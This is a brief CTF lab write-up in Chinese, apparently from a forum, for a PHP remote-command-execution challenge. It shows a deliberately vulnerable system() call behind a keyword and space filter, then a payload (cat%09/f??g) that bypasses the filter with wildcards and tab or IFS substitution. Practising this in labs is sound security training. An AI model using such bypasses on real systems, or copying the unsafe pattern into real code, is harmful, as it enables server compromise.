返回
7
0

RCE-labs-level7

iiice,2026-04-19 21:58
Plaintext
function hello_shell($cmd){
    if(preg_match("/flag| /", $cmd)){
        die("WAF!");
    }
    system($cmd);
}

isset($_GET['cmd']) ? hello_shell($_GET['cmd']) : null;

highlight_file(__FILE__);


?>

查看代码,发现flag、空格被过滤,所以要想办法绕过waf的过滤

Plaintext
http://80-cb3270bb-2833-4296-90e6-2023d27523b8.challenge.ctfplus.cn/?cmd=cat%09/f??g

1.绕过flag的过滤,利用通配符?

2.绕过空格,%09或&IFS&

暂无回复。你的想法是什么?


bottom-logo1
bottom-logo2captionbottom-logo3
GeeSec
商务合作
bottom-logo4
蜀ICP备2024047787号-2